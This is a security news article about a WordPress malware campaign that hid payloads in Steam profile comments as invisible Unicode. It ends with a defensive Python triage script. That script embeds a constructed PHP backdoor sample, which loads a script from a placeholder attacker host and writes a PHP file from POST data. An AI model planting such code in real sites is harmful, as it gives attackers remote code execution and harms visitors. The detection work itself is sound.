A recent malware campaign has alarmed the web security community by targeting WordPress websites in an unprecedented manner. The attackers behind this operation have devised a unique method of communication with compromised sites, cleverly concealing command instructions within Steam Community profile comments, thus transforming a renowned gaming platform into a covert control channel.
Innovative Malware Communication Method
This malware operates in two distinct stages. Initially, it injects harmful JavaScript into the frontend of a compromised WordPress site, which can serve dangerous content to any visitor landing on the page. Following this, a server-side backdoor is installed, granting attackers enduring remote access, enabling them to alter WordPress plugin and theme files without detection.
GoDaddy’s security team uncovered the campaign, which was first detected in July 2024 and now affects around 1,900 WordPress sites. The perpetrators disguise their operations by leveraging Valve’s reputable gaming platform rather than overtly malicious servers that could be easily identified and shut down.
Stealthy Techniques and Impact
What makes this malware particularly elusive is its use of steganography: the malicious payload is encoded in invisible Unicode characters inside Steam profile comments, so the comment looks harmless to a human reader. This technique allows it to evade traditional text-based scanning tools during routine security checks, making detection extremely challenging.
Compromised websites unknowingly distribute injected scripts to visitors, putting real users at risk. For site administrators, the threat is even more profound, as the backdoor facilitates unauthorized code modifications, even after partial removal efforts.
Technical Details of the Attack
The core of the malware leverages a PHP function embedded within the compromised WordPress installation. Upon page load, the malware dispatches an HTTP request to a Steam Community profile, extracting and decoding hidden payloads from comment text.
The decoded data is then injected into every front-end page as an external script URL via wp_enqueue_script, registered under a deceptive handle name that mimics a legitimate library. This URL, observed to point to hello-myworld[.]info, delivers the final malicious payload to site visitors.
Precautionary Measures and Analysis
The server-side component is equally dangerous, with a backdoor function allowing remote code execution via WordPress’s template_redirect hook. This function listens for specific POST requests and can rewrite plugin and theme files if the correct authentication cookies are presented.
The malware employs multiple obfuscation techniques to avoid detection, including encoding string constants and using randomized hexadecimal naming conventions. To mitigate the threat, site administrators should immediately activate maintenance mode, back up their site, and rotate all credentials. A thorough cleanup of all plugin and theme files is essential, as partial removal is insufficient due to the backdoor’s capabilities.
Indicators of compromise include suspicious transient cache entries and unknown external scripts. Any suspicious activity should be thoroughly investigated and addressed swiftly to prevent further damage.
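As an added example (not code from GoDaddy’s report or from the malware itself), the following Python triage script applies two of the checks described above to constructed samples: it surfaces invisible Unicode code points that a plain text scan would never match, and it flags theme or plugin PHP that enqueues a script from an unlisted host or writes files from a template_redirect handler. The host name, handle name and cookie name in the samples are placeholders.

```python
# Added example (not from the report): defender-side triage for invisible-Unicode text
# and suspicious WordPress hook usage. All sample inputs below are constructed.
import re
import unicodedata
from urllib.parse import urlparse

# Zero-width/format code points that render as nothing and can smuggle data past a human reader.
INVISIBLE = {0x200B, 0x200C, 0x200D, 0x2060, 0x2061, 0x2062, 0x2063, 0x2064, 0xFEFF, 0x00AD, 0x180E}
INVISIBLE_RANGES = [(0xE0000, 0xE007F), (0xFE00, 0xFE0F)]  # Unicode tag chars, variation selectors

def is_invisible(ch: str) -> bool:
    cp = ord(ch)
    return (cp in INVISIBLE or any(lo <= cp <= hi for lo, hi in INVISIBLE_RANGES)
            or unicodedata.category(ch) == "Cf")  # remaining format controls

def find_hidden(text: str):
    """Return (what a human sees, list of (index, U+XXXX) for each invisible code point)."""
    hidden = [(i, f"U+{ord(c):04X}") for i, c in enumerate(text) if is_invisible(c)]
    return "".join(c for c in text if not is_invisible(c)), hidden

ENQUEUE_RE = re.compile(r"wp_enqueue_script\s*\(\s*['\"]([^'\"]+)['\"]\s*,\s*['\"]([^'\"]+)['\"]")
TEMPLATE_REDIRECT_RE = re.compile(r"add_action\s*\(\s*['\"]template_redirect['\"]")

def audit_php(source: str, allowed_hosts: set) -> list:
    """Flag front-end scripts from unlisted hosts and template_redirect handlers that write files."""
    findings = []
    for handle, url in ENQUEUE_RE.findall(source):
        host = urlparse(url).hostname
        if host and host not in allowed_hosts:
            findings.append(f"script handle '{handle}' loads from unlisted host {host}")
    if (TEMPLATE_REDIRECT_RE.search(source) and "file_put_contents" in source
            and ("$_POST" in source or "$_COOKIE" in source)):
        findings.append("template_redirect handler writes files from request data")
    return findings

# Constructed: a harmless-looking comment carrying 16 zero-width characters.
SAMPLE_COMMENT = "nice profile gg" + "\u200b\u200c" * 8 + " :)"
# Constructed: a tampered theme file; the host is a placeholder, not a real indicator.
SAMPLE_PHP = """<?php
add_action('wp_enqueue_scripts', function () {
    wp_enqueue_script('jquery-migrate-min', 'https://cdn.attacker-example.invalid/m.js');
});
add_action('template_redirect', function () {
    if (isset($_POST['d'], $_COOKIE['auth'])) file_put_contents(__DIR__ . '/x.php', $_POST['d']);
});"""

if __name__ == "__main__":
    print(find_hidden(SAMPLE_COMMENT))
    print(audit_php(SAMPLE_PHP, {"code.jquery.com"}))
```

Running it over real theme and plugin directories and over captured comment text is the point; a clean WordPress install should produce an empty findings list for every file.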
